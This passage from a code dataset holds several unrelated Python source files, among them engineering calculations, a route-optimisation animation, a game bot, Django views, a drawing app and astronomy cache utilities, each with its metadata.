strength limits states:\n drum_Ix = (math.pi*((drum_OD**4)-(drum_ID**4))/64)# (mm^4)\n #print('drum Ix =',drum_Ix)\n drum_Z = (2*drum_Ix)/drum_OD # (mm^3)\n #print('drum Z =',drum_Z)\n w_service=(drum_mass+curtain_mass)/(opening_width/1000) #(N/mm)\n #print('Service UDL =',w_service)\n M_ult_drum = 1.2* w_service*((opening_width*1e-3)**2)/8 #(kN.m)\n #print('Ultimate moment=',M_ult_drum)\n service_deflection= (5/384)*((w_service*opening_width**4)/(200000*drum_Ix))\n Phi_M_drum = 0.9*f_sy*drum_Z *1e-6 #(kN.m)\n print('Drum bending capacity',Phi_M_drum)\n drum_bendingSF = Phi_M_drum/M_ult_drum\n return (dia_curtain, rolled_length, excess, drum_mass, curtain_mass, service_deflection, drum_bendingSF)\n\ndef driveloads(sprocket_info, chainwheel_type, drive_sprocket_type, motor_info, motor_type):\n drive_sprocket_geom = sprocket_info[drive_sprocket_type]\n drive_sprocket_PCD = (drive_sprocket_geom[0]*25.4/math.pi)\n drive_sprocket_OD = drive_sprocket_PCD+10\n chainwheel_geom = sprocket_info[chainwheel_type]\n chainwheel_PCD = (chainwheel_geom[0]*25.4/math.pi)\n chainwheel_OD = chainwheel_PCD + 10\n motor_data = motor_info[motor_type]\n motor_torque = motor_data[1]\n motor_weight = motor_data[2]\n chain_tension = 2*motor_torque/drive_sprocket_PCD\n #print('Chain tension = ', chain_tension)\n return (drive_sprocket_OD, chainwheel_OD,chain_tension)\n\ncurtain_results=curtain(slat_info, drum_height, drum_info, opening_width, bottom_rail)\nprint('Curtain rolled diameter = {0:.2f}mm \\n'\n 'Curtain rolled length = {1:.2f}mm \\n'\n 'Excess curtain on roll when door is closed {2:.2f}mm\\n'\n 'Drum m.g = {3:.2f}kN\\n'\n 'Curtain (including bottom rail) m.g = {4:.2f}kN\\n'\n 'Drum Deflection = {5:2f}\\n'\n 'Drum Strength Safety Factor = {6:2f}'.format(*curtain_results))\n\nload_results = driveloads(sprocket_info, chainwheel_type, drive_sprocket_type, motor_info, motor_type)\nprint('Drive sprocket OD = {0:.2f}mm \\n'\n 'Chainwheel OD = {1:.2f}mm \\n'\n 'Chain tension {2:.2f}kN'.format(*load_results))\n\n\n\n\n","sub_path":"Roller Doors/Door Diameter.py","file_name":"Door Diameter.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"547616062","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2013 NetApp, Inc.\n# All rights reserved.\n#\n\"\"\"\n\"\"\"\n# IMPORTANT\n# Run as \n# python template.py < A-small-practice.in >& A-small-practice.out\n\nfrom __future__ import print_function\nimport argparse\nimport getpass\nimport glob\nimport imp\nimport itertools\nimport logging\nimport pkg_resources\nimport pkgutil\nimport sys\nimport re\nimport ystockquote\nimport requests\nimport threading\nfrom multiprocessing import Process\nimport time\nimport bisect\n\n\n# This function will take a certain number, and generate the 'base' representation\n# of it. And it will output that in the form of a array ..\n# you have to provide how many 'bits' you want .. if there are excess, the leading\n# ones will be zero.\ndef convert_number_to_bit_string(number, num_bits, base=2):\n string_bits = [0 for i in range(num_bits)]\n index = len(string_bits) - 1\n while index >= 0:\n string_bits[index] = number%base\n number = number / base\n index = index -1\n return string_bits\n\n#USE THE function bisect.insort() whenever necessary\n#If a is sorted in ascending order, e.g a = [5, 7, 10, 17]\n# bisect.insort(a, 12) will insert 12 into the sorted array using binary search.\n# bisect.insort(a, 12) will result in [5, 7, 10, 12, 17]\n\nlogger = logging.getLogger(__name__)\n\ndef main():\n streamformat = \"%(message)s\"\n logging.basicConfig(level=logging.INFO,\n format=streamformat)\n data = sys.stdin.readlines()\n i = 0\n nums = [int(n) for n in data[i].split()]\n num_test_cases = nums[0]\n for j in range(num_test_cases):\n i = i + 1\n nums = [int(n) for n in data[i].split()]\n X = nums[0]\n R = nums[1]\n C= nums[2]\n temp_r = R\n if R > C:\n R = C\n C = temp_r \n answer = None\n if X == 1:\n answer = \"GABRIEL\"\n elif X == 2:\n if (R*C)%2 == 0:\n answer = \"GABRIEL\"\n else:\n answer = \"RICHARD\"\n elif X == 3:\n if (R*C)%3 != 0:\n answer = \"RICHARD\"\n elif ((C == 3 and R == 1) or (C==4 and R == 2)):\n answer = \"RICHARD\"\n else:\n answer = \"GABRIEL\"\n elif X == 4:\n if (R*C)%4 != 0:\n answer = \"RICHARD\"\n elif ((C == 2 and R == 2) or (C==4 and R == 1) or (C==4 and R ==2)):\n answer = \"RICHARD\"\n else:\n answer = \"GABRIEL\"\n logger.info(\"Case #{0}: {1}\".format(j+1, answer))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"solutions_5658571765186560_0/Python/chaitany/ominos.py","file_name":"ominos.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"132407991","text":"import ast\nimport csv\nimport math\nimport numpy\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom matplotlib import style\n\nDEBUGMODE = True\nfrom modules import dijkstra\nfrom itertools import permutations\nimport scipy\n\nwith open(\"/home/pelin/Documents/poi_opt/new_segments_v2.poi\", \"r\") as segment_txt:\n segments = ast.literal_eval(segment_txt.read())\n\nlookup = {}\n# with open(\"./database/lookup_v2.csv\", newline='') as lookup_fp:\n# lookup_csv = csv.reader(lookup_fp, delimiter=' ', quotechar='|')\n# for index, row in enumerate(lookup_csv):\n# if index != 0:\n# splitted_row = row[0].split(\";\")\n# source = splitted_row[0]\n# dest = splitted_row[1]\n# dist = float(splitted_row[2])\n# path = ast.literal_eval(splitted_row[3])\n# if source not in lookup:\n# lookup.update({source: {}})\n# lookup[source].update({dest: {\"length\": dist, \"route\": path}})\n\n\norderLots = {}\norderLots_original = {}\nwith open(\"/home/pelin/Documents/poi_opt/18_temmuz_new_point.csv\", newline='') as subat:\n lots = csv.reader(subat, delimiter=' ', quotechar='|')\n for index, row in enumerate(lots):\n if index != 0:\n splitted_row = row[0].split(\",\")\n source = splitted_row[2].split(\"-\")\n source[1] = \"{:0>2d}\".format(int(source[1]))\n source = \"-\".join(source)\n if int(splitted_row[0]) not in orderLots:\n orderLots.update({int(splitted_row[0]): []})\n orderLots_original.update({int(splitted_row[0]): {\"route\": [], \"length\": []}})\n orderLots[int(splitted_row[0])].append({\"lot\": source, \"weightGroup\": int(splitted_row[3])})\n orderLots_original[int(splitted_row[0])][\"route\"].append(source)\n\npoint_lookup = {}\nwith open(\"/home/pelin/Documents/poi_opt/points_lookup.csv\", newline='') as lookup_fp:\n lookup_pt = csv.reader(lookup_fp, delimiter=' ', quotechar='|')\n for index, row in enumerate(lookup_pt):\n if index != 0:\n splitted_row = row[0].split(\",\")\n corridor = splitted_row[0]\n old_point = splitted_row[1].split(\"-\")\n old_point[1] = \"{:0>2d}\".format(int(old_point[1]))\n old_point = \"-\".join(old_point)\n\n new_point = splitted_row[2].split(\"-\")\n new_point[1] = \"{:0>2d}\".format(int(new_point[1]))\n new_point = \"-\".join(new_point)\n\n lon = float(splitted_row[3])\n lat = float(splitted_row[4])\n if new_point not in point_lookup:\n point_lookup.update({new_point: []})\n point_lookup[new_point] = {\"koridor\": corridor,\n \"old_point\": old_point,\n \"lon\": lon,\n \"lat\": lat}\n\nsegment_graph = {}\nlotsFilteredMap = {}\navailableWeightGroups = []\nlotsFiltered = []\n\n\ndef mapData(order_id=4021374429): # 4021334198\n global availableWeightGroups, lotsFilteredMap, lotsFiltered\n print(\"SETTING UP DATA\") if DEBUGMODE else None\n for seg in segments:\n if seg[\"start\"] not in segment_graph:\n segment_graph.update({seg[\"start\"]: {}})\n segment_graph[seg[\"start\"]].update({seg[\"end\"]: {\"length\": seg[\"length\"]}})\n\n lotsFiltered = orderLots[order_id]\n print(\"Filtered Work Order Content:\\n {}\".format(lotsFiltered)) if DEBUGMODE else None\n\n for picked in lotsFiltered:\n lotsFilteredMap.update({picked[\"weightGroup\"]: {}}) if picked[\"weightGroup\"] not in lotsFilteredMap else None\n koridor = point_lookup[picked[\"lot\"]][\"koridor\"]\n if koridor not in lotsFilteredMap[picked[\"weightGroup\"]]:\n lotsFilteredMap[picked[\"weightGroup\"]].update({koridor: []})\n lotsFilteredMap[picked[\"weightGroup\"]][koridor].append(picked[\"lot\"])\n\n for weight in lotsFilteredMap:\n for cor in lotsFilteredMap[weight]:\n lotsFilteredMap[weight][cor] = sorted(lotsFilteredMap[weight][cor], key=lambda pick: point_lookup[pick][\"lon\"])\n print(\"Sorted Corridor: weight: {}, Corridor: {}, Order: {}\".format(weight, cor, lotsFilteredMap[weight][cor]))\n\n # print(\"Corridor ve Weight Dictionary: {}\".format(lotsFilteredMap)) if DEBUGMODE else None\n availableWeightGroups = list(lotsFilteredMap.keys())\n availableWeightGroups.sort()\n availableWeightGroups.reverse()\n # print(\"Available Weigth Groups: {}\".format(availableWeightGroups)) if DEBUGMODE else None\n\n\ndef getOriginalRoute(start_point, path, graph):\n route = {\"route\": [], \"full_route\": [start_point], \"length\": [0]}\n path = [start_point] + path + [start_point]\n route[\"route\"] = path\n for index, point in enumerate(path):\n try:\n next_point = path[index + 1]\n except IndexError:\n next_point = None\n if next_point:\n response = dijkstra.shortestPath(point, next_point, graph)\n route[\"length\"].append(response[\"length\"])\n response[\"points\"].pop(0)\n route[\"full_route\"] = route[\"full_route\"] + response[\"points\"]\n return route\n\n\ndef getShortestRoute(start_point):\n global lotsFilteredMap, segment_graph, lookup\n orderedLotsSegments = setLotsMap(lotsFilteredMap, start_point, segment_graph)\n orderedLotssegment_graph = {}\n\n for lot in orderedLotsSegments:\n if lot[\"start\"] not in orderedLotssegment_graph:\n orderedLotssegment_graph.update({lot[\"start\"]: {}})\n orderedLotssegment_graph[lot[\"start\"]].update({lot[\"end\"]: {\"route\": lot[\"route\"], \"length\": lot[\"length\"]}})\n\n orderedLotsShortestRoute = getShortestRouteBetweenTwoPoints(start_point, orderedLotssegment_graph)\n full_path = []\n length = [0]\n for index, element in enumerate(orderedLotsShortestRoute[\"points\"]):\n try:\n next_element = orderedLotsShortestRoute[\"points\"][index + 1]\n except IndexError:\n next_element = None\n\n if next_element:\n route_1 = orderedLotssegment_graph[element][next_element][\"route\"]\n length.append(orderedLotssegment_graph[element][next_element][\"length\"])\n if index == 0:\n full_path = full_path + route_1\n else:\n for i, rt in enumerate(route_1):\n if i != 0:\n full_path.append(rt)\n return {\"route\": orderedLotsShortestRoute[\"points\"], \"full_route\": full_path, \"length\": length}\n\n\ndef getShortestRouteBetweenTwoPoints(startPoint, _segment_graph):\n global lotsFiltered\n if len(lotsFiltered) < 15:\n routes_1 = getPossibleRoutes(startPoint, _segment_graph, 200000)\n else:\n routes_1 = getPossibleRoutes(startPoint, _segment_graph, 200000)\n\n return routes_1\n\n\ndef setLotsMap(lotsFilteredMap, start_point, graph):\n global availableWeightGroups\n q = []\n points = [start_point]\n for w in lotsFilteredMap:\n for c in lotsFilteredMap[w]:\n points = points + lotsFilteredMap[w][c]\n points.append(start_point)\n for source in points:\n for dest in points:\n shorthest_path = dijkstra.shortestPath(source, dest, graph)\n q.append({\"start\": source, \"end\": dest,\n \"route\": shorthest_path[\"points\"],\n \"length\": shorthest_path[\"length\"]})\n return q\n\n\ndef getPossibleRoutes(start, segments, monte_count):\n global lotsFilteredMap, lookup\n _map_ = ast.literal_eval(str(lotsFilteredMap))\n weights = list(_map_.keys())\n weights.sort()\n weights.reverse()\n weight_group = {}\n routes_ = []\n routes_dict = []\n for i in range(monte_count):\n\n route = [start]\n\n for weight in _map_:\n corridor_list = list(_map_[weight].keys())\n numpy.random.shuffle(corridor_list)\n weight_group.update({weight: corridor_list})\n\n for weight in weights:\n for corridor in weight_group[weight]:\n aaa = _map_[weight][corridor][:]\n if numpy.random.choice([True, False]):\n aaa.reverse()\n route = route + aaa\n\n route = route + [start]\n if route in routes_:\n pass\n else:\n length = 0\n\n for index, point in enumerate(route):\n try:\n next_point = route[index + 1]\n except IndexError:\n next_point = None\n\n if next_point:\n # length = length + segments[point][next_point][\"length\"]\n length = length + segments[point][next_point][\"length\"]\n routes_.append(route)\n routes_dict.append({\"points\": route, \"length\": length})\n length = 0\n\n min_length = math.inf\n shortest_route = {}\n for r in routes_dict:\n if r[\"length\"] < min_length:\n min_length = r[\"length\"]\n shortest_route = r\n\n return shortest_route\n\n\nplot_flag = True\nif plot_flag:\n routes_dict = {}\n # for orderId in orderLots:\n orderId = 4021433107\n # 4021374543 # 4021374204 # 4021373940 # 4021379460 # 4021377612 # 4021373867 # 4021379633 # 4021378357 # 4021378235 # 4021373865 4021373891\n mapData(order_id=orderId)\n original_route = getOriginalRoute(\"Yol-14\", orderLots_original[orderId][\"route\"], segment_graph)\n route = getShortestRoute(\"Yol-14\")\n routes_dict.update({orderId: route})\n print(\"Original Route ---> Length: {} Route: {}\".format(sum(original_route[\"length\"]), original_route[\"route\"]))\n # print(\"Original Full Route : {}\".format(original_route[\"full_route\"]))\n print(\"-------------------------------\")\n print(\"Found Route ---> Length: {} Route: {}\".format(sum(route[\"length\"]), route[\"route\"]))\n # print(\"Found Full Route: {}\".format(route[\"full_route\"]))\n\n jobs = lotsFilteredMap\n weighted_dict = {}\n job_obj = []\n for weight in jobs:\n\n for kor in jobs[weight]:\n for point in jobs[weight][kor]:\n dicti = {\"id\": point, \"isPicked\": False, \"lon\":point_lookup[point][\"lon\"], \"lat\":point_lookup[point][\"lat\"], \"weight\": weight}\n job_obj.append(dicti)\n\n\n original_length = sum(original_route[\"length\"])\n orig_route = original_route[\"full_route\"][:]\n orig_order_list = original_route[\"route\"][:]\n orig_order_list.pop(0)\n orig_order_list.pop(-1)\n found_length = sum(route[\"length\"])\n found_route = route[\"full_route\"][:]\n found_order_list = route[\"route\"][:]\n found_order_list.pop(0)\n found_order_list.pop(-1)\n backgroundImage = plt.imread(\"./database/depo_clear_svg1.png\")\n x_or = []\n y_or = []\n x = []\n y = []\n\n\n # plt.axis([0.01, 0.144, -0.040, -0.0060])\n\n fig, ax = plt.subplots(figsize=(12, 4.2), dpi=150, facecolor='#e5e5e5', edgecolor='#000000')\n fig.subplots_adjust(left=0, bottom=0, right=1, top=1, wspace=0, hspace=0)\n extent = (0.0077, 0.148, -0.040, -0.0058)\n ax.axis('off')\n ax.set_title(\"Work Order ID: {}\\nOriginal Distance: {:.2f}\\nShorthened Distance: {:.2f}\".format(orderId, original_length, found_length))\n im1 = ax.imshow(backgroundImage, alpha=0.37, cmap=plt.cm.gray, interpolation='nearest', extent=extent)\n found_line = ax.plot([], [], color='blue', linewidth=4, label=\"Found\")[0]\n orig_line = ax.plot([], [], color='red', linewidth=3, linestyle='dashed', label=\"Original\")[0]\n found_loc = ax.plot(point_lookup[\"Yol-14\"][\"lon\"], point_lookup[\"Yol-14\"][\"lat\"], color='blue', marker=\"v\", markersize=12, label=\"Current\")[0]\n orig_loc = ax.plot(point_lookup[\"Yol-14\"][\"lon\"], point_lookup[\"Yol-14\"][\"lat\"], color='red', marker=\"v\", markersize=12, label=\"Current\")[0]\n\n weight_marker = {1: {\"color\": \"#ffe900\", \"marker\": \"o\", \"size\": 6},\n 2: {\"color\": \"#bbff00\", \"marker\": \"o\", \"size\": 8},\n 3: {\"color\": \"#7fff00\", \"marker\": \"o\", \"size\": 10},\n 4: {\"color\": \"#00ff77\", \"marker\": \"o\", \"size\": 12}}\n weight_legend = []\n for weight in availableWeightGroups:\n weight_legend.append(ax.plot([], [],\n color=weight_marker[weight][\"color\"],\n marker=weight_marker[weight][\"marker\"],\n markersize=weight_marker[weight][\"size\"],\n label=\"Weight: {}\".format(weight))[0])\n ax.legend(loc=4, prop={'size': 6})\n wiegthLines = {}\n for job in job_obj:\n wiegthLines.update({job[\"id\"]: ax.plot(job[\"lon\"], job[\"lat\"],\n color=weight_marker[job[\"weight\"]][\"color\"],\n marker=weight_marker[job[\"weight\"]][\"marker\"],\n markersize=weight_marker[job[\"weight\"]][\"size\"],\n label=\"Weight: {}\".format(job[\"weight\"]))[0]})\n\n counter = 0\n counter1 = 0\n flag = False\n\n def draw(i):\n global flag, wiegthLines\n if i < len(orig_route):\n x_or.append(point_lookup[orig_route[i]][\"lon\"])\n y_or.append(point_lookup[orig_route[i]][\"lat\"])\n orig_loc.set_data(x_or[-1], y_or[-1])\n orig_line.set_data(x_or, y_or)\n if len(orig_order_list):\n if orig_order_list[0] == orig_route[i]:\n orig_order_list.pop(0)\n wiegthLines[orig_route[i]].set_color(\"gray\")\n flag = True\n else:\n k = i - len(orig_route)\n if flag:\n flag = False\n for job in job_obj:\n wiegthLines.update({job[\"id\"]: ax.plot(job[\"lon\"], job[\"lat\"],\n color=weight_marker[job[\"weight\"]][\"color\"],\n marker=weight_marker[job[\"weight\"]][\"marker\"],\n markersize=weight_marker[job[\"weight\"]][\"size\"],\n label=\"Weight: {}\".format(job[\"weight\"]))[0]})\n if len(found_order_list):\n if found_order_list[0] == found_route[k]:\n\n found_order_list.pop(0)\n wiegthLines[found_route[k]].set_color(\"gray\")\n\n x.append(point_lookup[found_route[k]][\"lon\"])\n y.append(point_lookup[found_route[k]][\"lat\"])\n found_line.set_data(x, y)\n found_loc.set_data(x[-1], y[-1])\n\n return [orig_line, found_line, orig_loc, found_loc] + list(wiegthLines.values())\n\n ani = animation.FuncAnimation(fig, draw, frames=len(orig_route)+len(found_route), interval=50, blit=True, repeat=False)\n\n plt.show()\n # from matplotlib import rcParams\n # rcParams['animation.ffmpeg_path'] = r'C:\\FFmpeg\\bin\\ffmpeg.exe'\n #\n # writer = \"ffmpeg\"\n # ani.save('./videos/newLayout_workOrder_{}.mp4'.format(orderId), writer=writer, dpi=200, metadata={\"title\": \"Captured Route Versus\",\n # \"artist\": \"Poi Labs\",\n # \"subtitle\": \"Work Order of {}\".format(orderId),\n # \"year\": 2019})\n # video_tag = ani.to_html5_video(embed_limit=5)\n # # print(video_tag)","sub_path":"animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":15527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"191258882","text":"\"\"\"\r\nThis is an example for a bot.\r\n\"\"\"\r\nfrom elf_kingdom import *\r\nfrom PrintData import print_data\r\n\r\ndef do_turn(game):\r\n \"\"\"\r\n Makes the bot run a single turn.\r\n\r\n :param game: the current game state.\r\n :type game: Game\r\n \"\"\"\r\n\r\n # loc1 = Location(1804, 1388)\r\n # loc2 = Location(700, 5800)\r\n # speed = 200\r\n # next_loc = loc1.towards(loc2, speed)\r\n # print next_loc\r\n #\r\n # loc1 = Location(0, 0)\r\n # for i in range(20):\r\n # loc2 = Location(100, i)\r\n # d = loc1.distance(loc2)\r\n # print i, d\r\n\r\n temp_mana = game.get_my_mana()\r\n # print_data(game, -1)\r\n # print_data(game, 32)\r\n temp_mana = handle_elves(game, temp_mana)\r\n temp_mana = handle_portals(game, temp_mana)\r\n\r\n\r\ndef handle_elves(game, temp_mana):\r\n \"\"\"\r\n Gives orders to my elves.\r\n\r\n :param game: the current game state.\r\n :type game: Game\r\n \"\"\"\r\n # Get enemy castle.\r\n enemy_castle = game.get_enemy_castle() # type: Castle\r\n enemy_portals = game.get_enemy_portals()\r\n enemy_elves = game.get_enemy_living_elves()\r\n\r\n # Go over all the living elves.\r\n for elf in game.get_my_living_elves():\r\n # Try to attack enemy castle, if not move to it.\r\n if game.turn < 30 and temp_mana >= game.portal_cost and elf.can_build_portal():\r\n elf.build_portal()\r\n temp_mana -= game.portal_cost\r\n game.debug( \"elf %s is building a portal\" %elf)\r\n continue\r\n\r\n # if len(enemy_portals) > 0:\r\n # attack_or_move(game, elf, enemy_portals[0])\r\n # continue\r\n\r\n if len(enemy_elves) > 0:\r\n attack_or_move(game, elf, enemy_elves[0])\r\n continue\r\n\r\n attack_or_move(game, elf, enemy_castle)\r\n\r\n return temp_mana\r\n\r\n\r\ndef attack_or_move(game, elf, target):\r\n if elf.in_attack_range(target):\r\n # Attack!\r\n elf.attack(target)\r\n # Print a message.\r\n game.debug(\"elf %s attacks %s\" % (elf, target))\r\n else:\r\n # Move to enemy castle!\r\n elf.move_to(target)\r\n # Print a message.\r\n game.debug(\"elf %s moves to %s\" % (elf, target))\r\n\r\n\r\ndef handle_portals(game, temp_mana):\r\n \"\"\"\r\n Gives orders to my portals.\r\n\r\n :param game: the current game state.\r\n :type game: Game\r\n \"\"\"\r\n # Go over all of my portals.\r\n if game.turn < 20:\r\n return\r\n\r\n for portal in game.get_my_portals():\r\n # If the portal can summon a lava giant, do that.\r\n if (game.turn % 100) < 50:\r\n if temp_mana >= game.lava_giant_cost and portal.can_summon_lava_giant():\r\n # Summon the lava giant.\r\n portal.summon_lava_giant()\r\n temp_mana -= game.lava_giant_cost\r\n\r\n # Print a message.\r\n game.debug(\"portal %s summons a lava giant\" %(portal))\r\n else:\r\n if temp_mana >= game.ice_troll_cost and portal.can_summon_ice_troll():\r\n # Summon the lava giant.\r\n portal.summon_ice_troll()\r\n temp_mana -= game.ice_troll_cost\r\n # Print a message.\r\n game.debug(\"portal %s summons an ice troll\" %(portal))\r\n\r\n return temp_mana\r\n","sub_path":"MyBot.py","file_name":"MyBot.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"344159020","text":"#-*- encoding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom models import ItemAgenda\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom forms import FormItemAgenda\nfrom django.template import RequestContext\nfrom django.http import Http404\n\ndef lista(request):\n lista_itens = ItemAgenda.objects.all()\n return render_to_response(\"lista.html\",{'lista_itens':lista_itens},\n context_instance = RequestContext(request))\n\ndef adiciona(request):\n if request.method == \"POST\":\n form = FormItemAgenda(request.POST,request.FILES)\n if form.is_valid():\n form.save()\n \"\"\" so necessita se for feito o form na mao\n dados = form.cleaned_data\n item = ItemAgenda(\n data=dados['data'],\n hora=dados['hora'],\n titulo=dados['titulo'],\n descricao=dados['descricao'],\n )\n item.save()\"\"\"\n return render_to_response(\"salvo.html\",{})\n pass\n else:\n form = FormItemAgenda()\n return render_to_response(\"adiciona.html\",{'form':form},\n context_instance=RequestContext(request))\n\ndef item(request,nr_item):\n item = get_object_or_404(ItemAgenda,pk=nr_item)\n if request.method == \"POST\":\n form = FormItemAgenda(request.POST,request.FILES, instance=item)\n if form.is_valid():\n form.save()\n return render_to_response(\"salvo.html\",{})\n\n\n form = FormItemAgenda(instance=item)\n return render_to_response(\"item.html\",{'form':form},\n context_instance = RequestContext(request))\n\ndef remove(request,nr_item):\n item = get_object_or_404(ItemAgenda,pk=nr_item)\n if request.method == \"POST\":\n item.delete()\n return render_to_response(\"removido.html\",{})\n return render_to_response(\"remove.html\",{'item':item},\n context_instance = RequestContext(request))\n","sub_path":"gerenciador/agenda/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"518826072","text":"\"\"\"The edx_lint list command.\"\"\"\n\nimport pkg_resources\n\n\ndef list_main(argv_unused): # pylint: disable=unused-argument\n \"\"\"\n list\n List the FILENAMEs that edx_lint can provide.\n \"\"\"\n print(\"edx_lint knows about these files:\")\n for filename in pkg_resources.resource_listdir(\"edx_lint\", \"files\"):\n print(filename)\n\n return 0\n","sub_path":"edx_lint/cmd/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"346509598","text":"from django.db import models\n\n# Create your models here.\nclass Product(models.Model):\n\n id = models.BigAutoField(primary_key=True) # each item has distinct id. gives each item unique number\n title = models.CharField(max_length=200)\n description = models.TextField(blank=True, null=True) # can be left blank\n price = models.DecimalField(decimal_places = 2, max_digits=1000)\n image = models.ImageField(null=True, blank=True) # image has url\n listing_id\t= models.IntegerField(blank=True, null=True)\n productLink = models.URLField(max_length=200)\n\n def imageURL(self):\n try:\n url = self.image.url\n except:\n url = ''\n\n return url\n","sub_path":"firstpage/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"204427294","text":"import web\nfrom views.utils import get_nav_bar\nfrom models.project import get_categories, get_projects_by_status_and_category\n\n# Get html templates\nrender = web.template.render('templates/')\n\nclass Open_projects:\n \n def GET(self):\n \"\"\"\n Get all open projects \n\n :return: A page containing all open projects\n \"\"\"\n session = web.ctx.session\n data = web.input(categoryid=0)\n open_projects=[]\n if data.categoryid != 0:\n open_projects = get_projects_by_status_and_category(data.categoryid, \"open\")\n nav = get_nav_bar(session)\n categories = get_categories()\n return render.open_projects(nav, categories, open_projects)\n","sub_path":"src/app/views/open_projects.py","file_name":"open_projects.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"647261119","text":"from sys import stdin\ndef quick(lista):\n if len(lista) == 0:\n return []\n else:\n mitad = lista[-1]\n men, may = quick(menor(lista,mitad)),quick(mayor(lista,mitad))\n return men + [mitad] + may\ndef menor(lista,mitad):\n y = []\n for x in lista[:-1]:\n if x < mitad:\n y.append(x)\n return y\ndef mayor(lista,mitad):\n y = []\n for x in lista[:-1]:\n if x >= mitad:\n y.append(x)\n return y\ndef main():\n num = int(stdin.readline())\n while num != 0:\n lista = [int(x) for x in stdin.readline().strip().split()]\n print(\" \".join([str(x) for x in quick(lista)]))\n num = int(stdin.readline())\nmain()\n","sub_path":"ejercicios/Recurrence/ageord.py","file_name":"ageord.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"105193773","text":"import tkinter as tk\n\nwindow=tk.Tk()\nwindow.title('画板')\nwindow.geometry('+250+100')\ndraw=tk.Canvas(window,width=800,height=400)\ndraw.pack()\ndef paint(event):\n draw.create_oval(event.x-5,event.y-5,event.x+5,event.y+5,fill='black')\ndef clear(event,x=tk.ALL):\n return draw.delete(x)\ndraw.bind('',paint)\ndraw.bind('',clear)\ndraw.focus_set()\ntk.Label(window,text='按住鼠标左键绘图!空格键快捷清空!').pack(side=tk.BOTTOM)\ntk.Button(window,text='清空画板',command=lambda x=tk.ALL:draw.delete(x)).pack(side=tk.BOTTOM)\ntk.mainloop()\n","sub_path":"Python/画板程序/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"264354165","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"This module standardizes access to\nvarious files used throughout the halotools package. \n\"\"\"\n\n__all__ = ['get_catalogs_dir']\n\nsupported_sim_list = ['bolshoi', 'bolplanck', 'consuelo', 'multidark']\n\nimport os\nfrom astropy.config.paths import get_cache_dir as get_astropy_cache_dir\nfrom astropy.config.paths import _find_home\nimport warnings\n\nfrom . import sim_defaults\n\nfrom ..custom_exceptions import UnsupportedSimError, CatalogTypeError\n\ndef simname_is_supported(simname):\n \"\"\" Method returns a boolean for whether or not the input \n simname corresponds to a Halotools-supported simulation, as determined by \n the sub-classes of `~halotools.sim_manager.NbodySimulation`. \n\n Parameters \n ----------\n simname : string, optional \n Nickname of the simulation. Currently supported simulations are \n Bolshoi (simname = ``bolshoi``), Consuelo (simname = ``consuelo``), \n MultiDark (simname = ``multidark``), and Bolshoi-Planck (simname = ``bolplanck``). \n\n Returns \n -------\n is_supported : bool \n\n \"\"\"\n return simname in supported_sim_list\n\ndef defensively_create_subdir(dirname):\n if not os.path.exists(dirname):\n try:\n os.mkdir(dirname)\n except OSError as e:\n if not os.path.exists(dirname):\n raise IOError(\"OS Error during creation of path %s\" % dirname)\n elif not os.path.isdir(dirname):\n msg = 'Pathname {0} is not a directory'\n raise IOError(msg.format(dirname))\n\n\ndef get_supported_halo_finders(input_simname):\n\n if input_simname not in supported_sim_list:\n raise UnsupportedSimError(input_simname)\n elif input_simname == 'bolshoi':\n return ['bdm', 'rockstar']\n else:\n return ['rockstar']\n\ndef get_catalogs_dir(**kwargs):\n \"\"\" Find the path to the subdirectory of the halotools cache directory \n where `catalog_type` are stored. \n \n If the directory doesn't exist, make it, then return the path. \n\n Parameters\n ----------\n catalog_type : string, optional \n String giving the type of catalog. \n Should be 'particles', 'subhalos', or 'raw_halos'. \n\n simname : string, optional \n Nickname of the simulation. Currently supported simulations are \n Bolshoi (simname = ``bolshoi``), Consuelo (simname = ``consuelo``), \n MultiDark (simname = ``multidark``), and Bolshoi-Planck (simname = ``bolplanck``). \n\n halo_finder : string, optional \n Nickname of the halo-finder, e.g., `rockstar` or `bdm`. \n\n external_cache_loc : string, optional \n Absolute path to an alternative source of halo catalogs. \n Method assumes that ``external_cache_loc`` is organized in the \n same way that the normal Halotools cache is. Specifically: \n\n * Particle tables should located in ``external_cache_loc/particle_catalogs/simname``\n\n * Processed halo tables should located in ``external_cache_loc/halo_catalogs/simname/halo_finder``\n\n * Raw halo tables (unprocessed ASCII) should located in ``external_cache_loc/raw_halo_catalogs/simname/halo_finder``\n\n Returns\n -------\n dirname : str\n Path to the halotools directory storing simulation data.\n\n \"\"\"\n\n # Identify the root cache directory\n if 'external_cache_loc' in kwargs.keys():\n if os.path.isdir(kwargs['external_cache_loc']) is False:\n raise KeyError(\"Input external_cache_loc directory = %s \\n Directory does not exist\" % kwargs['external_cache_loc'])\n else:\n halotools_cache_dir = 